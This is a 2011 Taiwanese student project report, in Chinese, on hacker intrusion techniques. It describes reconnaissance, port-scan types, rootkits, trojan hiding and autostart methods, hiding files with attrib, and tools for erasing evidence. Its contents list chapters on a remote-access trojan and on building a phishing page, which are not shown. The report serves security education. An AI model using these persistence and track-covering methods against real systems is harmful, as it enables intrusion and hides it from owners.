修 平 技 術 學 院

資訊網路技術系實務專題報告

駭客入侵技術之分析研討

組 長：吳東洲 BN96084

組 員：翁嘉哲 BN96073

吳恩維 BN96083

陳冠勛 BN96085

羅元廷 BN96111

指導老師： 楊旺財 老師

中華民國 一百年 四 月

修 平 技 術 學 院

資訊網路技術系實務專題報告

駭客入侵技術之分析研討

組 長：吳東洲 BN96084

組 員：翁嘉哲 BN96073

吳恩維 BN96083

陳冠勛 BN96085

羅元廷 BN96111

指導老師： 楊旺財 老師

評審老師： 老師

老師

老師

中華民國 一百年 四 月

II

目錄 圖目錄……………………………………………………………………III

表目錄……………………………………………………………………IV

摘要………………………………………………………………………. V

致謝………………………………………………………………………VI

第一章 緒論 .............................................. 1

1.1 前 言 ................................................. 1

1.2 研究動機與目的 ......................................... 3

第二章 文獻探討 .......................................... 4

2.1 偵測 Reconnaissance .................................... 4

2.1.1 偵察類型(Reconnaissance Types) ............... 4

2.2 掃描 Scanning .......................................... 5

2.2.1 連接埠(Port)掃描 ............................. 6

2.3 取得存取權限 Gaining access .......................... 10

2.3.1 密碼破解 .................................... 11

2.4 擁有存取權限 Maintaining access ...................... 13

2.4.1 何謂 rootkit ？ ............................. 13

2.4.2 木馬和後門程式的基本介紹 .................... 14

2.4.3 木馬的工作原理 .............................. 16

2.5 清除蹤跡 ............................................. 19

2.5.1 檔案隱藏 .................................... 19

2.5.2 使用 Attrib 命令隱藏檔案 ..................... 19

2.5.3 證據清除 .................................... 20

第三章 駭客工具介紹 ..................................... 21

3.1 Snanning工具 ........................................ 21

3.1.1 HoverIP ..................................... 21

3.1.2 Port Scanner 介紹 ........................... 28

3.1.3 Nmap ......................................... 31

II

3.1.4 Spy Sweeper .................................. 38

3.1.5 Super Scan 4.0 ............................... 48

3.2 System Hackering (系統攻擊工具) ....................... 55

3.2.1 鍵盤側錄（Keylogger） ........................ 55

3.2.2 Beast2.07遠端病毒遙控 ...................... 58

3.2.3英文數字字典檔 ............................... 66

3.2.4 數字、字母、符號 混合字典版 .................. 68

3.2.5 FamilyKeyLogger .............................. 70

第四章 入侵範例實作 ..................................... 73

4.1 何謂釣魚網站 .......................................... 73

4.2 資料庫記錄帳密和轉址系統 .............................. 74

4.2.1何謂轉址? .................................... 74

4.2.2 何謂資料庫? .................................. 74

4.2.3 JSP 資料庫回傳和轉址解說 .................... 75

4.3 釣魚網頁修改 .......................................... 77

4.3.1 FACEBOOK 的網址修改 ......................... 77

4.4 釣魚網站的小品影片 .................................... 78

第五章 問題討論 ......................................... 81

5.1 問題探討 .............................................. 81

參考文獻

IV

圖目錄

圖 2-1 TCP Connect 掃描 ..................................... 7

圖 2-2 SYN 掃描 ............................................. 8

圖 2-3 NULL 掃描 ............................................ 8

圖 2-4 FIN 掃描 ............................................ 9

圖 2-5 Xmas-Tree掃描 ...................................... 10

圖 3-1 IP 介面設定 ......................................... 22

圖 3-2 Nslookup DNS 查詢 .................................. 23

圖 3-3 Ping 之功能 ........................................ 24

圖 3-4 Ping(2)之功能 ...................................... 25

圖 3-5 Traceroute 之功能 ................................... 26

圖 3-6 Tracerout(2)之功能 ................................. 27

圖 3-7 Port Scanner ....................................... 28

圖 3-8 Ping Scanner ....................................... 29

圖 3-10 Host Monitor ...................................... 30

圖 3-11HOST 搜尋目標主機 IP 位置 ............................ 33

圖 3-12 HOST 資料 .......................................... 34

圖 3-13 對方 PORT .......................................... 35

圖 3-14 Spy Sweeper 首頁 ................................... 39

圖 3-15掃描工作區 ......................................... 40

圖 3-16 Spy Sweeper 掃描中 ................................. 41

圖 3-17掃描結果 ........................................... 42

圖 3-18隔離威脅 ........................................... 43

圖 3-19防護設定區 ......................................... 44

圖 3-20隔離區 ............................................. 45

圖 3-21 Option ............................................ 46

圖 3-22 Super Scan 4.0執行檔的圖示 ........................ 48

圖 3-23 Super Scan 4.0的使用介面 .......................... 49

圖 3-24 Super Scan 4.0 Scan ............................... 50

圖 3-25轉換 IP ............................................ 51

圖 3-26 Super Scan 4.0檢測 ................................ 52

IV

圖 3-27 連接埠檢測 ........................................ 53

圖 3-28 Keylogger使用介面 ................................. 55

圖 3-29 Option ............................................ 56

圖 3-30 側錄內容 .......................................... 57

圖 3-31 Beast2.07介面 ..................................... 58

圖 3-32 Basic服務器選項 ................................... 60

圖 3-33 Notifications 選項 ................................ 61

圖 3-34 StartUp 的選項 ..................................... 62

圖 3-35 AV-FW Kill 選項 .................................... 62

圖 3-36 Beast其他選項 ..................................... 63

圖 3-37 Beast Exe Icon .................................... 64

圖 3-38 Port 設定 .......................................... 65

圖 3-39 字典檔介面 ........................................ 66

圖 3-40 字典檔生成 ........................................ 67

圖 3-41 字典檔加入#字號混英文 ............................. 68

圖 3-42字典檔英數混合 ..................................... 68

圖 3-43 字典檔符號混合 .................................... 69

圖 3-44 字典檔年月日混合 .................................. 69

圖 3-45 FamilyKeyLogger 介面的一些功能設定 ................. 70

圖 3-46 取消隱藏按熱鍵默認情況下 .......................... 70

圖 3-47 FamilyKeyLogger 基本操作設定 ....................... 71

圖 4-1修改登入網址 ........................................ 77

圖 4-2影片截圖 ............................................ 79

圖 4-3 影片截圖 ........................................... 79

圖 4-4影片截圖 ............................................ 80

表目錄

表 2-1 常用 Port 號 ........................................ 6

表 3-1 Beast 服務器設置 .................................... 59

V

摘 要

在資訊爆發的時代裡，在網際網路上隨時隨地都有人在交換訊息、

傳遞電子郵件、上傳及下載遠端檔案資料。隨著網路資訊技術的日趨先

進，網路上的安全憂慮成為人們最關心的話題。駭客、病毒攻擊的事件

層出不窮，入侵的手段也愈來愈高明，但這些有心人士的惡意攻擊行

為，卻是叫人無從防範起，因為他們是藏身在世界上的各個角落，只要

透過 Internet 的使用，就可以惡意的入侵到你的電腦裡，任由它的大

肄破壞，而你卻對它一點辦法都沒有。

因此，我們深信當全世界的人都在享受 Internet 所提供的多項便

利服務及功能時，隨著資訊便利而來的則是令人擔憂的網路資訊安全問

題。儘管知道網路的通訊技術並非萬能，但我們卻不可否認它必須存在

我們的生活當中。所以適時的去充實、學習，擁有良好正確的資訊安全

知識是必備的。

首先我們先來介紹駭客如何透過 Internet 來達到破壞系統竊取資

料的方法，再來就是有關電腦病毒的介紹，並進一步分類說明病毒與木

馬及木馬與遠端搖控有何不同？而這些一系列的問題又可能對我們的

電腦帶來那些的危害與不便。其實，如果仔細的去分析駭客和電腦病

毒，它們都有一個共通點，那就是電子郵件 e-mail，寄寄郵件、收收

e-mail，這個對現在身處在資訊發達時代的我們來說，就像是每天必定

會做的事情，但是科技的進步雖然為人類帶來了不少的便利，相對的它

也為人類帶來了極大的危機。

另外，我們會再藉由所實作的釣魚網站實例來簡略說明駭客的行

為。因為在電腦網路時代來臨之時，很少人會想到遠在另外一端的電腦

會對自己電腦中的資料產生什麼樣的影響，但資料在電腦及網路中其實

可能早已面臨了許多不同方式與管道的攻擊和威脅，所以應該更進一步

的去深切了解網路安全的重要性，好加以防範。

VI

致謝

本組第一次做這樣一個像樣的專題要感謝廖振忠學長從旁的指

導，在暑假時也不遺餘力的教授我們許多駭客工具跟電腦知識，再來感

謝數媒歐政華同學教導我們剪輯影片，也感謝蘇錦發同學友情贊助ＤＶ

協同拍攝，還有感謝張瀝元和吳佾真同學提供我們照片當做教材，最後

感謝我們的指導老師楊旺財老師盡心盡力的指導教學，日以繼夜的督

導。

1/83

第一章 緒論

1.1 前 言

一直已來隨著網路新技術不斷地快速發展，網路確實帶給了人們不

少的便利，但相對的它也帶給了人們許多的隱憂和危機，像是網路駭客

還有電腦病毒也都是藉由網路傳播來廣為盛行而延伸出來的問題。也就

是因為這樣網路的技術愈發盛行，而伴隨著網路的便利所帶來的安全問

題也愈來愈值得我們去關心，再加上網路管理者及使用者缺乏對網路資

訊安全的認知，使得網路成為不法的使用者可利用的工具。

談到網路資訊安全，我們就先從「電腦駭客」來談起吧！「駭客」

這個名詞其實一開始是用在於「一群對於觸發電腦革命即聰明、積極的

電腦程式設計人員」，他們都有著崇高的理想，因為他們都是想藉由科

技發展的力量來創造美好的事物幫助他人，這些人就是最早所謂的「駭

客」，但是自從有些心懷不軌的人，自恃著學習過一些如何撰寫攻擊程

式的小伎倆而四處的在搞破壞，還自以為是的稱自己是「駭客」，從此

改寫了駭客在人們心中的定義，搞的現在只要一聽到駭客就會讓人有刻

版映像。

而在網路上的另一種危害就是「電腦病毒」，電腦病毒其實只是一

組程式碼，不過它與其它程式不同的地方在於它會不斷的繁殖；早先的

電腦病毒通常都會寄生在可執行檔，或者是軟、硬碟的開機磁區中，隨

著被感染的檔案載入病毒並且執行進而控制整個電腦；現在因為網路的

普遍使用，使得病毒普遍的流傳而達到破壞的目的，這種就是所謂的「電

腦蠕蟲」。

再來的另一種網路駭客最常使用的方法－「特洛伊木馬」，一般人

稱之為木馬程式，特洛伊木馬程式其實就是一種遠端遙控程式，通常它

2/83

有一個主要的特性，那就是控制人要將一支木馬程式植入到被控制人的

電腦裡，然後就可以進一步的遙控被控制人的電腦，如果是不懷好意的

人可能還會竊取被控制人電腦裡的重要資料甚至破壞它。

因此，網路上使用者對於網路資訊安全應有初步的認知，並清楚的

了解網路上那些不肖的非法行為之所以能夠有機可乘肇因於網路上的

不安全。不論是，使用者的使用習慣不正確、軟體設計不良或者是系統

本身的缺陷、網路防護不夠嚴謹……等等。任何一種情況都有可能是系

統被入侵或資料被竊取的原因。所以應該要加以懂得如何去防護，徹底

防堵所有可能的安全死角。

3/83

1.2 研究動機與目的

在這個網際網路與寬頻迅速擴展的時代，為使用者帶來了搜尋資料

的方便性，我們藉由著網路搜尋的動作，上傳下載者各類型的檔案資

料，但是網路使用者往往都忽略因為這些不經意的查詢或下載動作，而

造成了那些不懷好意的電腦使用者有機可趁，並也藉由網路媒介或系

統、軟體漏洞，進行各類資料的竊取和檔案的破壞行為。一般許多的電

腦使用者對電腦網路資安問題認知與憂患意識不夠，完全依賴電腦及網

路，並還有個錯誤的觀念，認為只要不隨便開啟、收發來路不明的

e-mail，或只要安裝防毒、防駭軟體，就不會有安全上的疑慮了。但卻

忘了最重要的一點是，使用防毒、防駭軟體來控管，還需定時勤於更新

解毒碼。而事實上！只要你的電腦有連接上網，就隨時隨地存在著網路

安全方面的危機。

我們深感網路世界有許多不明因素的潛在危險,引發我們對網路的

資安問題有想更深入的去了解，於是集合了幾位對網路有興趣的同學，

共同組成了網路資訊安全的專題小組，來進一步去探討網路資訊安全方

面的維護與防範順便藉由整理及介紹，把一般資訊安全的觀念介紹給有

緣人。本專題小組深感了解，在這伴隨數位資訊日益俱增的時代，要如

何抵禦來自於網際網路的威脅，已是我們須共同面對的重要問題。

4/83

第二章 文獻探討

想當一個駭客，必須得會一些攻擊步驟

一個駭客的攻擊，主要包括了五大步驟，分別為偵測

（Reconnaissance）、掃描（Scanning）、取得存取權限（Gaining

access）、擁有存取權限（Maintaining access）、清除蹤跡（Clearing

tracks），讓我們來為您一一的做介紹。

2.1 偵測 Reconnaissance

駭客要在有效攻擊中，首先進行有價值的偵察，簡單來說，就是要

了解能夠發起攻擊的類型。如果目標運行著 Microsoft伺服器，那麼對

它發起於 UNIX漏洞利用相關的攻擊是毫無意義的。

花在調查上的些許時間將會替滲透攻擊省下大量時間，惡意攻擊者

在突破目標的安全防線之前可能要花費數月時間來進行仔細的觀察。

主機偵查的目標是發現下列資訊：

1.目標網路上主機的 IP位址

2.目標系統上可存取的 UDP Port和 TCP Port

3 目標系統上使用的作業系統

偵測是指準備階段時，攻擊者的目標，收集所選目標盡可能多的資訊。

2.1.1 偵察類型(Reconnaissance Types)

偵查可以劃分為兩種類型:被動偵查(passive)和主動偵查(Active)。

被動偵查需要花費大量的時間，並且成功的可能性因人、因事而異。

被動偵查最常見的著手位置是目標的 Web 網站。

主動偵查能夠揭示更多資訊，但其缺點是風險更大，更用於被檢測到。

主動偵查的第一個步驟是識別出目標網路中的主機。

5/83

被動(passive)

被動偵查從開放的資訊中收集資料。開放資訊意味著這些資訊可以

自由地從外部存取。檢視開放資訊是安全合法的行為。對於這些資訊的

保護，企業幾乎做不了什麼。舉個例子：譬如有兩個小偷，一個是他在

準備行竊的房子四周閒晃(被動偵查)，另一個是趴在房子的每一個窗戶

上窺探裡面有什麼東西(主動偵查)，很明顯地，窺探窗戶的那個小偷比

走過房子旁邊的小偷更值得懷疑。

被動偵查包括從下述管道獲取資訊：社群會議、Web 網站、Edgars

資料庫、UUNet新聞群組、商業夥伴、垃圾收尋及社會工程。

主動(Active)

儘管被動偵查也很有效，但他經常要花費大量時間，但並不會產生

最精確的結果。在主動偵查中，使用技術工具發現目標網路上活動主機

的資訊。然而，主動偵查也存在著缺點 主要是這種偵查模式容易被發

覺。

主動偵查使用了目標能夠監測到被偵查的技術，包括區域傳輸、

DNS、ping 掃描、路由跟蹤、Port 掃描及 OS特徵檢測。

2.2 掃描 Scanning

網路掃描是真正攻擊或入侵之前的準備工作。

然後在盡可能短的時間內對目標進行掃瞄。完成掃瞄後，可對所獲數據

進行分析，發現安全漏洞。

6/83

2.2.1 連接埠(Port)掃描

在知道了目標網路上有哪些主機能夠公開存取之後，就需要確定這

些主機上開放了哪些 Port。使用 Port 掃描可以完成這個任務，Port

掃描是透過掃描主機確定哪一些 TCP和 UDP Port 可以存取的過程。

現有的絕大多數應用程式都運作於 TCP 或 UDP 之上，這些協議是眾

多應用程式使用的傳輸機制，如 FTP、簡單郵件傳輸協議(SMTP)、動態

主機配置協議(DHCP)及 HTTP 等。TCP 是一種對等連接的協議，也就是

說，他透過在主機之間建立連接來提供可靠的存取。與此相反。UDP 是

一種無連接協議，它不提供可靠性保證。

TCP和 UDP透過 Port號識別他們要傳遞數據的應用程式。表 2-1

列出了常用的 TCP和 UDP Port 號。透過這些 Port 號，可以確定目標主

機上執行著什麼樣的應用程式。透過 Port掃描，來尋找目標主機上開

放的 TCP和 UDP Port。

表 2-1 常用 Port 號

TCP UDP

應用程式 Port號 應用程式 Port號

FTP 20-21 DNS 53

Telnet 23 DHCP 67-68

SMTP 25 TFTP 69

DNS 53 NTP(網路時間協議) 123

HTTP 80 SNMP(簡單網路管理協議) 161

POP(電子郵件協議) 110

NNTP(網路新聞傳輸協議) 119

HTTPS(超文件傳輸協議安全協議) 443

7/83

Port掃描有幾種類型，主要包括：

TCP Connect()掃描、SYN、NULL、FIN、ACK

Xmas-Tree、Dumb掃描。

TCP Connect 掃描

TCP Connect 掃描試圖與每一個 TCP Port 進行三項交握通信。完

成如圖 2-1 所示的三項交握提供了進行 Port 掃描時最精確的結論。但

是，這種類型的掃描也最容易被防火牆或入侵檢測系統檢測到。因此，

為了降低掃描被檢測到的風險，應該盡量考慮使用其他類型的掃描。

圖 2-1 TCP Connect 掃描

SYN 掃描

略為隱蔽一些的 Port 掃描方法是執行 SYN 掃描。剛剛講過，TCP

三項交握依次包含了 SYN、SYN-ACK 和 ACK 三個封包。SYN 掃描僅僅發

送初始的 SYN 封包給目標主機。如圖 2-2 所示，如果 Port 處於開放狀

態，那麼目標主機將回應 SYN-ACK 封包；如果 Port 處於關閉狀態，那

麼他將回應 RST封包。

8/83

圖 2-2 SYN 掃描

NULL 掃描

在 NULL 掃描中，將一個沒有設定旗標的封包發送給 TCP Port。在

正常的 TCP 通信中，至少旗標要被設定。在 NULL 掃描中，所有旗標都

不設定。根據 RFC793 的要求，如果收到一個沒有設定旗標的資料分段，

那麼接收主機應該去丟棄這個分段，並發送一個 RST 封包。如圖 2-3

所示，當向每一個 TCP Port 發送沒有設定旗標的封包時，如果目標主

機上該 Port 處於關閉狀態，那麼他將回應一個 RST 封包；如果該 Port

處於開放狀態，那麼主機忽略該封包，不會有回應封包到達發起掃描的

客戶端電腦。

圖 2-3 NULL 掃描

FIN 掃描

另一種類型的反向掃描為 FIN 掃描。與 NULL掃描相似，FIN掃描也

比 SYN 和 TCP Connect 掃描更隱蔽一些。在 FIN 掃描中，一個設定了

FIN 位元的封包被發送給目標主機的每一個 Port。FIN位元指示 TCP

Session的結束。與所有類型的反向掃描一樣，回應 RST 封包表示 Port

9/83

關閉，沒有回應表示 Port開放，圖 2-4 展示了對 FIN的回應。

圖 2-4 FIN 掃描

ACK 掃描

ACK掃描是指在正常的 TCP 操作中，在幾個指定接收主機宣告視窗

長度(Advertised Windows Size)的封包之後，發送回應封包(ACK)。在

ACK 掃描中，使用回應封包來發現防火牆的配置資訊。如果某個 Port

被防火牆過濾，那麼就沒有回來的封包。如果某個 Port 沒有被防火牆

過濾(傳輸到指定 Port 的流量可以穿越防火牆)，那麼返回 RST 封包。

透過檢測 RST 封包，可以了解 Port被防火牆過濾掉，哪些 Port 沒有被

過濾掉。

Xmas-Tree 掃描

圖 2-5說明 Xmas-Tree(耶誕樹)掃描中封包的形式。Xmas-Tree掃描

發送帶有下述標誌的 TCP封包：

URG ------指示資料是緊急資料，應該馬上被處理。

PSH ------強制將資料送入緩衝區

FIN ------在結束 TCP Session 時使用。

10/83

圖 2-5 Xmas-Tree掃描

這個掃描中使用的技巧並不是這些旗標原來的用途，但它們可以在一起

同時使用。正常的 TCP 連接不應該同時設定這三個標誌。Xmas-Tree 掃

描返回於其他反向掃描相同的結果，並且依然不能確定 Windows平台上

Port的關閉與開放。

Dumb 掃描

Dumb掃描(啞掃描)也稱為 Idle 掃描或反向掃描，Dumb掃描是另一

種掃描方法，在掃描目標主機的過程中，他使用第三方的殭屍電腦做為

『啞』主機進行掃描。殭屍主機是一台被入侵的空閒主機。典型情況下，

這台主機並不儲存敏感資料，對此類型主機的存取通常並不會引起人們

的注意。

使用 Dumb 掃描時，向目標發送一個 SYN 封包。是由殭屍主機發送

這個封包。如果 Port 處於開放狀態，目標將回應以期待的 SYN/ACK 封

包。如果 Port處於關閉狀態，那麼目標回應以 RST 封包。

2.3 取得存取權限 Gaining access

駭客利用該系統的漏洞，獲得入侵的權限。

該漏洞可能發生在一個區域網路、網際網路，或作為欺騙和盜竊。例子

包括緩衝區外流，拒絕服務、會話劫持以及密碼破解。

11/83

2.3.1 密碼破解

在電腦發明之前，企業和政府機構使用門鎖和檔案櫃來保護資料的

安全。實體安全對於保護有形的資產讓人可以覺得安心。現在透過網路

能夠在任何地方存取企業資料，實體安全就開始顯得對資料無法提供足

夠的保護了。

因此企業就開始轉向採用存取控制來保護自己的資料。安全的存取

控制至少應該採取下述方法的兩種方法：

‧被認證者知道的東西 ---- 個人身分證號或密碼。

‧被認證者擁有的東西 ---- SecureID 卡。

‧被認證者是誰 ---- 生物特徵。

雙元素安全指至少採用上述兩種控制模式的存取控制，如透過指紋

和密碼進行存取授權。不幸的事，絕大多數的人還是依然使用最弱的安

全認證模式---僅僅使用密碼的單元素認證。由於一般使用帳號和密

碼，人們就認為這就是使用了雙元素認證，但帳號和密碼模式的認證仍

然是一種單元素認證，原因在於它僅是基於我們所知道的東西。

密碼提供了最弱的安全認證模式，原因在於人們可以透過猜測方式

破解密碼。作為入侵測試人員，我們應該需要知道密碼破解的方式。當

出於策略審查目的的進行密碼破解時，我們試圖確定企業是否強制實施

了其密碼策略。例如，假設企業安全策略中有一條，要求密碼至少是 8

個字元以上，並且使用字母數字的組合。

“密碼”透過只允許知道密碼的人才可存取系統以保護主機的安

全。一般情況下，透過下列兩個步驟獲取對系統的存取：

(1)認證----在認證階段，依據有效帳號和密碼資料庫的內容檢查

帳號和密碼如果找到匹配的帳號和密碼，那麼進入到第

二階段。

12/83

(2)授權----在授權階段，依據定義授權用戶如何存取系統的資料

庫內容，檢查帳號和密碼。系統首先認證用戶，之後再

根據用戶的安全存取級別進行授權。

13/83

2.4 擁有存取權限 Maintaining access

維護擁有存取權限指的是當駭客嘗試保留他該系統的所有權。駭客

可以使系統變堅固及其他駭客擁有此系統，保證他們能獨占存取後門程

序、rootkits或木馬。

2.4.1 何謂 rootkit ？

rootkit 這個名詞，來自 root 與 kit 兩個字的結合。root 是

unix 系統中管理者的名稱，代表 unix 系統裡的最高權限；kit 則是

工具套件的意思。

因此我們可以了解 rootkit 是一套要可以讓攻擊者取得受害電腦

最高權限的工具，為了維持以後與該部電腦之聯繫，攻擊者利用 root

權限隱藏與電腦的溝通，不讓管理者發現。

實際上 rootkit 所做的就是隱藏攻擊者的蹤跡並植入一些可以收

集使用者帳號與密碼的工具。在 unix 環境中，攻擊者進入電腦後，首

要的工作就是安裝 rootkit，但通常必須具備 root 帳號的權限才能夠

安裝 rootkit，所以攻擊者就會利用已知的遠端遙控弱點或其他破解方

式來取得 root 的帳號與密碼。

rootkit 工具能偽裝成正常的程式，暗中把真正的程式換掉，並留

下一些特殊的後門，以方便往後控制主機運作，或進行資料竊取。

rootkit 也稱為後門程式 (backdoor) 或 木馬程式 (trojan)。

駭客利用各種方法 (遠端攻擊、密碼猜測、暴力破解...等) 來取

14/83

得系統的 root 權後，即可在目標主機上面安裝 rootkit 來隱藏入侵

的蹤跡，並且保留下次使用 root 帳號的權限，所以說 rootkit 是讓

攻擊者再一次進入您電腦的工具。

2.4.2 木馬和後門程式的基本介紹

木馬是特洛伊木馬的簡稱，英文為 Trojan Horse。根據 Web 百科線

上字典的定義，木馬是一種偽裝成良性應用軟體的破壞性程式。最陰險

的木馬類型之一是宣稱能夠幫助你電腦擺脫病毒但實際上在你的電腦

中安裝病毒的惡意程式。

木馬這個名子源自於古希臘傳說，他是指透過一個特定的程式(木

馬程式)來控制另一台電腦。木馬通常有兩個可執行程式：一個是客戶

端，也稱為控制端；另一個是伺服端，也稱為被控制端。

木馬的設計者為了防止木馬被發現，而採用多種手段隱藏木馬。木

馬的服務一旦執行並被控制端連接，其控制端將享有伺服端的大部分操

作權限，例如電腦增加帳號，瀏覽、移動、複製、刪除檔案，修改登錄

檔，更改電腦設定等。按照木馬破壞系統的模式及對系統所造成的損

害，可以對木馬進行分類。

目前主要有七種類型的木馬：

‧ 遠端存取木馬：它稱為惡意駭客提供了進入被控制主機的遠端

Shell。

‧ 資料竊取木馬：它向駭客發送敏感資料，如密碼、信用卡資訊、日

誌檔案、郵件位址、即時通訊聯絡人清單等。這個木馬可以尋找特

定的資料，或者安裝鍵盤紀錄程式，並將按鍵紀錄發送給攻擊者。

15/83

‧ 破壞性木馬：它設計用於銷毀和刪除檔案，通常看起來像病毒，但

又不會被防毒程式檢測到。

‧ 代理木馬：它將犧牲者的電腦作為代理伺服器，這種攻擊者利用犧

牲者的電腦做他想做的任何事情提供了管道，包刮進行信用卡詐欺

及其他非法的行為，或是利用該系統對其他網路和系統發起攻擊。

‧ FTP 木馬：它設計用於打開 Port21(FTP 傳輸 Port)，並讓攻擊者使

用檔案傳輸協議(FTP, File Transfer Protocol)連接到犧牲者的電

腦上。

‧ 安全軟體關閉木馬：它用於客戶不知情的情況下終止或關閉安全程

式，如防毒程式或防火牆。這種類型的木馬通常與其他類型的木馬

結合使用。

‧ 拒絕服務攻擊木馬：它透過發送無用封包及流量來阻塞網路或主

機，發起 DoS 攻擊。很多 DoS 攻擊 (例如 Ping of Death和 Teardrop

攻擊) 都利用了 TCP/IP協議的限制。

儘管每一個木馬的目的都不相同，但其執行模式的是相似的---將

自己隱藏在主機上，並執行侵入者指定的動作。木馬再駭客入侵中是一

種不可缺少的工具。

後門(backdoor)

也稱做 Trapdoor，它以一種未透過正常管道的模式獲取對程式、

線上服務甚至整個電腦系統的存取。後門通常只有編寫這個程式的人員

知道這個後門程式，因此後門是一種潛在的安全風險。

16/83

2.4.3 木馬的工作原理

木馬的整個運作過程包括植入、觸發、維持、應用等步驟。下面基

本原理開始，介紹與木馬相關的基礎知識。

木馬的工作模式

一般來說，木馬程式包括客戶端與伺服端兩部份。其功能，客戶端

執行在入侵者的作業系統上，是入侵者控制目標主機的平台；伺服端執

行在目標主機上，是被控制的平台，一般發送給目標主機的部份就是伺

服端的檔案。

目前，木馬主要是依靠郵件、下載等途徑進行傳播。然後木馬透過

一定的提示誘惑使目標主機執行木馬的伺服端程式，實現木馬的植入。

例如入侵者偽裝成目標主機用戶的好朋友，發送了一張綑綁(binder)

有木馬的電子賀卡。當目標主機打開賀卡後，螢幕上雖然會出現賀卡的

畫面，但此時木馬伺服端程式已經在背後執行了。由於木馬的體積通常

很小，大部分在幾 KB 到幾十 KB 之間，因此難以從體積上判斷一個檔案

中是否綑綁了木馬。

此外木馬也可以透過各種腳本進行傳播。例如，IE 瀏覽器執行腳本

時存在一些漏洞，入侵者可以利用這些漏洞進行木馬的傳播與植入。

當然目標主機執行了木馬的伺服端程式之後，入侵者便可以透過客

戶端程式與目標主機上的伺服端建立連線，進而控指目標主機。對於通

訊協議的選擇，絕大多數木馬使用的是 TCP/IP 協議，但也有使用 UDP

協議的木馬。

17/83

一方面，木馬的伺服端程式會盡可能的隱蔽行蹤，同時監聽某個特

定的 Port，等待客戶端的連接；另一方面，伺服端程式為了在每次重

新啟動電腦後都能正常執行，還需要透過修改登錄檔的方法實現自動啟

動功能。

木馬隱藏手段

木馬是一種入侵軟體，由於其本身固有的用途與特點(不可告知

性)，需要將自己隱藏起來。只有木馬不被目標主機的操作者發現，入

侵者才能長期掌握目標主機的控制權。木馬的隱藏決定了一款木馬的優

劣，一般來說，木馬做到以下幾個方面的隱藏：

‧ 工作列圖示的隱藏

‧ 在「工作管理員」裡隱藏

‧ 通信 Port 的隱藏

‧ 加載模式的隱藏

‧ 其他隱藏技術

在研究了其他軟體的長處之後，木馬開發者發現，Windows下的中

文化軟體採用的陷阱技術非常適合木馬的使用。這是一種更新、更隱蔽

的方法。透過修改虛擬設備驅動程式(VxD)或修改動態連結函式庫(DLL)

來加載木馬。這種方法與一般方法不同，他基本上擺脫了原有的木馬模

式---監聽 Port，而採用替代系統功能的方法(改寫 VxD 或 DLL檔案)，

木馬會將修改後的 DLL 替換系統以之的 DLL，並對所有的函數呼叫進行

過濾。被替換的 DLL 檔案對網路進行監聽，一旦發現控制端的請求就啟

用自身，並將自己綁在一個行程上執行相關的木馬操作。這樣做的好處

是沒有增加新的檔案，不需要打開新的 Port，沒有新的行程，使用常

規的方法監測不到它。並且經過測試，木馬沒有出現任何異常現象，且

木馬的控制端向被控制端發出特定訊息後，隱藏的程式就立即開始運

18/83

作。

木馬的啟動模式

作為一個優秀的木馬，自動啟動功能是必不可缺少。自動啟動可以

保證木馬不會因為用戶的一次關機操作而徹底失去作用。正因為該項技

術如此重要，所以很多編程人員都在不斷研究和探索新的自啟動技術。

一個典型的例子就是把木馬加入到用戶常執行的程式 (例如

Explorer.exe)中，當用戶執行該程式時，木馬就自動執行。當然更加

普遍的方法就是透過修改 Windows系統檔案和登入檔實現自動啟動。實

現自啟動常用方法包括下述幾種：

‧ 透過”啟動”資料夾實現自啟動

‧ 在 Win.ini 檔中啟動

‧ 在 System.ini檔案中啟動

‧ 在*.ini檔案中啟動

‧ 透過修改檔案關聯啟動

‧ 透過綑綁檔案模式啟動

‧ 透過改變特定的程式名稱模式啟動

‧ 透過 Autoexec.bat檔案，或 winstart.bat，config.sys檔案啟動

‧ 透過登入檔啟動

駭客欺騙用戶執行木馬的方法

木馬是一個軟體，它由使用者傳播或植入，而不會自己長腳跑到用

戶的機器上，正像《特洛伊木馬》劇情中描述的一樣，木馬往往是用戶

自己將其帶進電腦中的。有了木馬程式，如果沒有高超的騙術，木馬也

無用武之地，因此這裡講簡單地介紹幾種網路上型的欺騙方法：

19/83

‧ 綑綁欺騙

‧ 郵件冒名欺騙

‧ 壓縮檔偽裝

‧ 網頁欺騙

目的是讓大家了解這些騙術的內容，如果遇到類似情況，也可以當場揭

穿不會付出城池失守的代價。

欺騙的方法相當多樣，並且隨著時間的推移，新的方法和手段也都會被

發明出來。

2.5 清除蹤跡

清除蹤跡就跟現代戰爭一樣，如何隱藏自己，出奇不意是致勝關鍵

因素之一。在滲透測試和駭客攻擊中，也需要對檔案進行隱藏，以便不

致引起管理員的注意;在完成測試後，需要清除掉攻擊過程中留下的痕

跡，包括日誌紀錄等;證據清除是駭客保護自己手段之一，目的是在系

統資料中不留下蹤影，透過一系列隱藏的手段，可以將自己被發現的機

率降到最低。

2.5.1 檔案隱藏

檔案隱藏的方法有很多種，主要包括利用作業系統的特點隱藏檔案，使

用 Rootkit 隱藏檔案，或者利用 windows 系統的特點隱藏檔案

如：使用 Attrib 命令隱藏

使用替換資料流隱藏

2.5.2 使用 Attrib 命令隱藏檔案

Attrib 是一個 DOS命令，攻擊者可以使用這個命令來隱藏自己的

20/83

檔案或修改被攻擊系統的檔案屬性。

Attrib[{+r|-r}][{+a|-a}][{+s|-s}][{+h|-h}]

+r:設定唯讀屬性

-r:設定清除屬性

+a:設定保存檔案屬性

-a 清除保存檔案屬性

+s 清除系統屬性

-s 清除系統屬性

+h 設定隱藏屬性

-h 清楚隱藏屬性

2.5.3 證據清除

清除工具

例如： 1.ZeroTracks 2.Tracks Eraser Pro 3.Ersaer 清除證據

ZeroTracks

是一款免費的證據清除軟體，他能夠清除電腦使用過程中產生的很

多痕跡，如:最近檔案清單、瀏覽的資料夾紀錄、清除 WINDOWS臨時資

料夾。

Tracks Eraser Pro

功能：清除電腦中所有不想要的歷史資料、包括緩衝區資料、COOKIES、

操作歷史、最近操作文件 等等。

Ersaer

功能：清除加密檔案和磁碟、清除交換檔案、清除壓縮檔案磁碟..等等。

21/83

第三章駭客工具介紹

網路上有許多的駭客攻擊程式，一個駭客的攻擊，主要包括了五大

步驟，分別為偵測（Reconnaissance）、掃描（Scanning）、取得存取權

限（Gaining access）、擁有存取權限（Maintaining access）、清除蹤

跡（Clearing tracks），以下我們介紹幾種比較常見的駭客工具。

3.1 Snanning 工具

Snanning 工具有很多種，例如： CurrPorts、 Angry IP、

SuperScan4.0、NSLookUpTab、HoverIP、Lanview、Port Scanner、Nmap、

Spy Sweeper 等，以下為你介紹幾個工具使用方法。

3.1.1 HoverIP

